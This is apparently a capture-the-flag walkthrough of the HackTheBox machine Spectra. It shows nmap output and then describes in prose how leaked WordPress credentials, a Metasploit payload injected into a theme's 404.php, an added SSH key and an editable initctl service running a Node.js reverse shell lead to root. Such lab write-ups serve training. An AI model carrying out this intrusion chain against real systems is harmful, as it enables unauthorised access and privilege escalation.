CTF-Writeups/HackTheBox/Spectra.md
2021-03-07 01:18:41 +05:00

3.8 KiB

HackTheBox-Spectra

NMAP

PORT     STATE SERVICE          VERSION                                   
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http             nginx 1.17.4                                   
|_http-server-header: nginx/1.17.4                 
|_http-title: Site doesn't have a title (text/html).                 
3306/tcp open  mysql            MySQL (unauthorized)
8081/tcp open  blackice-icecap?                                              
| fingerprint-strings:                                               
|   FourOhFourRequest:                            
|     HTTP/1.1 200 OK                                                     
|     Content-Type: text/plain                                            
|     Date: Thu, 04 Mar 2021 16:38:15 GMT
|     Connection: close                               
|     Hello World                               
|   GetRequest:                      
|     HTTP/1.1 200 OK                
|     Content-Type: text/plain                                            
|     Date: Thu, 04 Mar 2021 16:38:14 GMT                                 
|     Connection: close              
|     Hello World                    
|   HTTPOptions:                     
|     HTTP/1.1 200 OK                
|     Content-Type: text/plain                                            
|     Date: Thu, 04 Mar 2021 16:38:25 GMT                                 
|     Connection: close              
|_    Hello World        

PORT 80 (HTTP)

Clicking on Test or Softwaer Issue Tracker would be leading us to http://spectra.htb so let's add this to /etc/hosts

Going to wp-config.php.save we can find credentials to the database

But when connecting to them it just doesn't allow

Wpscan

So we can't connect to mysql so we have a wordpress site let's run wpscan on it

So we have a wordpress user administrator

Using the password devteam01 we logged in with administrator

We can edit the 404.php template in the active theme

Using a metasploit payload

Add ssh public key in /home/nginx/.ssh/authorized_keys

Going in /opt directory

We find a passwd file

ssh as katie

On doing sudo -l we'll see what we can run as root

And we can run initctl which is used for running services, these services are stored in /etc/init

We can see the services we can edit

Here this service is running a nodejs file which is nodetest.js

This is what we see when we visit port 8081 on the web browser we can edit this file by a node js reverse shell

After editing set a netcat listener